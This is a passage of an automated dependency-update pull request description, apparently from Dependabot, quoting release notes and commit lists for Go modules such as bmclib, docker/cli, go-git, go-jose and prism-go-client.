href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eadd \u0026quot;homeassistant\u0026quot; provider by \u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(intelamt): implement Closer interface correctly by \u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eAdds BMC, BIOS firmware install support for Supermicro X11SSL-F by \u003ca href=\"https://github.com/joelrebel\"\u003e\u003ccode\u003e@​joelrebel\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/431\"\u003ebmc-toolbox/bmclib#431\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: fall back to System path for VirtualMedia discovery by \u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eredfishwrapper: make SetVirtualMedia fall back on failure by \u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/mergify\"\u003e\u003ccode\u003e@​mergify\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/405\"\u003ebmc-toolbox/bmclib#405\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/407\"\u003ebmc-toolbox/bmclib#407\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MrFlynn\"\u003e\u003ccode\u003e@​MrFlynn\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/416\"\u003ebmc-toolbox/bmclib#416\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/chrigl\"\u003e\u003ccode\u003e@​chrigl\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/427\"\u003ebmc-toolbox/bmclib#427\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/rpardini\"\u003e\u003ccode\u003e@​rpardini\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/428\"\u003ebmc-toolbox/bmclib#428\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/oprinmarius\"\u003e\u003ccode\u003e@​oprinmarius\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/430\"\u003ebmc-toolbox/bmclib#430\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/y-isono\"\u003e\u003ccode\u003e@​y-isono\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/433\"\u003ebmc-toolbox/bmclib#433\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jmejco\"\u003e\u003ccode\u003e@​jmejco\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/434\"\u003ebmc-toolbox/bmclib#434\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.4...v2.3.5\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.4\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAllow specifying the Redfish system name: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/400\"\u003ebmc-toolbox/bmclib#400\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate redfish system name matching by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/401\"\u003ebmc-toolbox/bmclib#401\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eproviders/supermicro/supermicro.go: Initialize sum 'client' during serviceclient init by \u003ca href=\"https://github.com/splaspood\"\u003e\u003ccode\u003e@​splaspood\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/402\"\u003ebmc-toolbox/bmclib#402\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\"\u003ehttps://github.com/bmc-toolbox/bmclib/compare/v2.3.3...v2.3.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev2.3.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate virtual media mounting: by \u003ca href=\"https://github.com/jacobweinstock\"\u003e\u003ccode\u003e@​jacobweinstock\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/398\"\u003ebmc-toolbox/bmclib#398\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eexpand response payload processing by \u003ca href=\"https://github.com/DoctorVin\"\u003e\u003ccode\u003e@​DoctorVin\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/bmc-toolbox/bmclib/pull/399\"\u003ebmc-toolbox/bmclib#399\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/bmc-toolbox/bmclib/commits/v2.3.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/docker/cli` from 29.2.0+incompatible to 29.4.2+incompatible\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/055a478ea9010a19d0d4674c0d0e87ade37a4223\"\u003e\u003ccode\u003e055a478\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6945\"\u003e#6945\u003c/a\u003e from thaJeztah/bump_moby\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d0f5b279e9ead4cadc6f78a2ea0ff29f652f1c50\"\u003e\u003ccode\u003ed0f5b27\u003c/code\u003e\u003c/a\u003e cmd/docker-trust: bump moby/client v0.4.1, moby/api v1.54.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/b7f37e86da572a12dcea84a2e08183132bf51e00\"\u003e\u003ccode\u003eb7f37e8\u003c/code\u003e\u003c/a\u003e vendor: github.com/moby/moby/client v0.4.1, moby/api v1.54.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/c93d892f0ea0145d9e6ab99bb4aae7dbcb389d61\"\u003e\u003ccode\u003ec93d892\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6949\"\u003e#6949\u003c/a\u003e from thaJeztah/bump_utils\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/3553cafa13f691eb0a5a726f5457929c44fd55e7\"\u003e\u003ccode\u003e3553caf\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6948\"\u003e#6948\u003c/a\u003e from thaJeztah/bump_trust_deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/266f039bb52fd237388f08e874aa719d6a6e9835\"\u003e\u003ccode\u003e266f039\u003c/code\u003e\u003c/a\u003e Dockerfile: update compose to v5.1.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/d74d3c3b163abbb084d50676da34a0055d45b855\"\u003e\u003ccode\u003ed74d3c3\u003c/code\u003e\u003c/a\u003e Dockerfile: update buildx to v0.33.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/134c2a0ed627f03cc0e6d1806f96a0b68331dc50\"\u003e\u003ccode\u003e134c2a0\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/docker/cli/issues/6826\"\u003e#6826\u003c/a\u003e from thaJeztah/bump_golangci_lint2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/58a7c3155b14d6696bb8cb2d7a77c48a555848c1\"\u003e\u003ccode\u003e58a7c31\u003c/code\u003e\u003c/a\u003e golangci-lint: fix lint failures from v2.10.1 upgrade\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/docker/cli/commit/f37a9e663fca9f351cdbe3e18353292125108285\"\u003e\u003ccode\u003ef37a9e6\u003c/code\u003e\u003c/a\u003e Dockerfile: update golangci-lint to v2.10.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/docker/cli/compare/v29.2.0...v29.4.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-git/v5` from 5.17.1 to 5.18.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-git/releases\"\u003egithub.com/go-git/go-git/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.18.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eplumbing: transport/http, Add support for followRedirects policy by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/2004\"\u003ego-git/go-git#2004\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.2...v5.18.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev5.17.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003ebuild: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY] (releases/v5.x) by \u003ca href=\"https://github.com/go-git-renovate\"\u003e\u003ccode\u003e@​go-git-renovate\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1941\"\u003ego-git/go-git#1941\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edotgit: skip writing pack files that already exist on disk by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-git/pull/1944\"\u003ego-git/go-git#1944\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e:warning: This release fixes a bug (\u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1942\"\u003ego-git/go-git#1942\u003c/a\u003e) that blocked some users from upgrading to \u003ccode\u003ev5.17.1\u003c/code\u003e. Thanks \u003ca href=\"https://github.com/pskrbasu\"\u003e\u003ccode\u003e@​pskrbasu\u003c/code\u003e\u003c/a\u003e for reporting it. :bow:\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\"\u003ehttps://github.com/go-git/go-git/compare/v5.17.1...v5.17.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/ea3e7ec9dfc54f577a01afb4dd601c0284604264\"\u003e\u003ccode\u003eea3e7ec\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/2004\"\u003e#2004\u003c/a\u003e from go-git/v5-http-hardening\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/bcd20a9c525826081262a06a9ed9c3167abfcd53\"\u003e\u003ccode\u003ebcd20a9\u003c/code\u003e\u003c/a\u003e plumbing: transport/http, Add support for followRedirects policy\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/45ae193b3a60aa8ec8a3e373f7265a7819473d5f\"\u003e\u003ccode\u003e45ae193\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1944\"\u003e#1944\u003c/a\u003e from go-git/fix-perms\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/fda4f7464b597ff33d2dea1c026482a5e900037c\"\u003e\u003ccode\u003efda4f74\u003c/code\u003e\u003c/a\u003e storage: filesystem/dotgit, Skip writing pack files that already exist on disk\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/2212dc7caeb2a389fe2129923811ef63f75a557a\"\u003e\u003ccode\u003e2212dc7\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/go-git/go-git/issues/1941\"\u003e#1941\u003c/a\u003e from go-git/renovate/releases/v5.x-go-github.com-go-...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-git/go-git/commit/ebb2d7da7f5d5aebeaa0b5e13276d72d602c1ae3\"\u003e\u003ccode\u003eebb2d7d\u003c/code\u003e\u003c/a\u003e build: Update module github.com/go-git/go-git/v5 to v5.17.1 [SECURITY]\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-git/go-git/compare/v5.17.1...v5.18.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-jose/go-jose/v3` from 3.0.4 to 3.0.5\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-jose/go-jose/releases\"\u003egithub.com/go-jose/go-jose/v3's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev3.0.5\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cp\u003eFixes \u003ca href=\"https://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\"\u003ehttps://github.com/go-jose/go-jose/security/advisories/GHSA-78h2-9frx-2jm8\u003c/a\u003e\u003c/p\u003e\n\u003cp\u003eWe recommend migrating from v3 to v4, and we will stop support v3 in the near future.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ehttps://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/be2f6548701d4ba561cd61c7d4a2f1289b66c273\"\u003e\u003ccode\u003ebe2f654\u003c/code\u003e\u003c/a\u003e ci: update Go versions for GHA workflows (\u003ca href=\"https://redirect.github.com/go-jose/go-jose/issues/221\"\u003e#221\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/go-jose/go-jose/commit/02464163e1e891db85257cb8860978a1c0226016\"\u003e\u003ccode\u003e0246416\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/go-jose/go-jose/compare/v3.0.4...v3.0.5\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/nutanix-cloud-native/prism-go-client` from 0.3.4 to 0.7.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/releases\"\u003egithub.com/nutanix-cloud-native/prism-go-client's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.7.1\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: Adding changes to support error handling by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/344\"\u003enutanix-cloud-native/prism-go-client#344\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add DeleteCdRom and GenerateConsoleToken to VMs service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/343\"\u003enutanix-cloud-native/prism-go-client#343\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.7.0...v0.7.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.7.0\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003efeat: API keys transparent basic authentication in prism-go-client by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/304\"\u003enutanix-cloud-native/prism-go-client#304\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Add v4 IAM Users API by \u003ca href=\"https://github.com/dlipovetsky\"\u003e\u003ccode\u003e@​dlipovetsky\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/219\"\u003enutanix-cloud-native/prism-go-client#219\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: implement SubnetIPReservation in converged client (NCN-111641) by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/316\"\u003enutanix-cloud-native/prism-go-client#316\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement List and Get methods for Users service by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/317\"\u003enutanix-cloud-native/prism-go-client#317\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Implement DomainManager service with GetPrismCentralVersion by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/318\"\u003enutanix-cloud-native/prism-go-client#318\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: removed usused Karbon/NKE APIs and renamed in-use APIs to Konnector by \u003ca href=\"https://github.com/manoj-nutanix\"\u003e\u003ccode\u003e@​manoj-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/325\"\u003enutanix-cloud-native/prism-go-client#325\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add Images, Templates, and OVAs services for V4 packer migration by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/327\"\u003enutanix-cloud-native/prism-go-client#327\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: V4 API fixes for Objects Lite upload and configurable timeouts  by \u003ca href=\"https://github.com/adarshanand25\"\u003e\u003ccode\u003e@​adarshanand25\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/328\"\u003enutanix-cloud-native/prism-go-client#328\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: Adding api call to add customAttributes to VM by \u003ca href=\"https://github.com/abhay-nutanix\"\u003e\u003ccode\u003e@​abhay-nutanix\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/334\"\u003enutanix-cloud-native/prism-go-client#334\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eNote\u003c/h3\u003e\n\u003cp\u003eThis prism-go-client release requires minimum PC and AOS versions v7.5. For older PC and AOS versions, please use prism-go-client v0.6.x\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.7.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.4\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/Vedansh074\"\u003e\u003ccode\u003e@​Vedansh074\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/nutanix-cloud-native/prism-go-client/pull/350\"\u003enutanix-cloud-native/prism-go-client#350\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.6.4\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.3...v0.6.4\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.6.3\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.2...v0.6.3\"\u003ehttps://github.com/nutanix-cloud-native/prism-go-client/compare/v0.6.2...v0.6.3\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nutanix-cloud-native/prism-go-client/blob/main/CHANGELOG.md\"\u003egithub.com/nutanix-cloud-native/prism-go-client's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003eChangelog\u003c/h1\u003e\n\u003cp\u003eAll notable changes to this project will be documented in this file.\u003c/p\u003e\n\u003cp\u003eThe format is based on \u003ca href=\"https://keepachangelog.com/en/1.0.0/\"\u003eKeep a Changelog\u003c/a\u003e,\nand this project adheres to \u003ca href=\"https://semver.org/spec/v2.0.0.html\"\u003eSemantic Versioning\u003c/a\u003e.\u003c/p\u003e\n\u003ch2\u003e[v0.6.1]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd transparent Basic authentication via API keys in prism-go-client\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.6.0]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdd methods for Idempotence Identifiers API in v3\u003c/li\u003e\n\u003cli\u003eAPI key based authentication support in v3\u003c/li\u003e\n\u003cli\u003eAdd client method to fetch kubeconfig in Karbon\u003c/li\u003e\n\u003cli\u003eAdd converged client as utility wrapper for v4\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the underlying struct used for Cluster to swagger-generated in v3\u003c/li\u003e\n\u003cli\u003eSwitch to go-swagger generated structs for recovery plan\u003c/li\u003e\n\u003cli\u003eChange the underlying API/Client used for StorageContainers in v4\u003c/li\u003e\n\u003cli\u003eAdd defensive code to avoid panics\u003c/li\u003e\n\u003cli\u003eMove ClientOptions to environment/types\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemove clients for fc \u0026amp; foundation\u003c/li\u003e\n\u003cli\u003eRemove utils package\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.5]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Remove pagination handling in ListAllHost as endpoint doesn't support pagination\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.4]\u003c/h2\u003e\n\u003ch3\u003eFixed\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eBugfix: Add defensive validation in v3 and v4 cache GetOrCreate to prevent panics when ManagementEndpoint has nil Address or empty required fields\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.3]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e[v0.5.2]\u003c/h2\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for creating, deleting, and listing idempotence identifiers.\u003c/li\u003e\n\u003cli\u003eadded the new v4 storage container client from clustermgmt namespace as it is based on the v4 beta APIs.\u003c/li\u003e\n\u003cli\u003eAdded support for authenticating using API key based authentication.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eChanged\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate the v3 VM structs to include VM vTPM configuration.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eRemoved\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eRemoved the v4 storage container client from storage namespace as it was based on the v4 alpha APIs which are no longer supported.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted 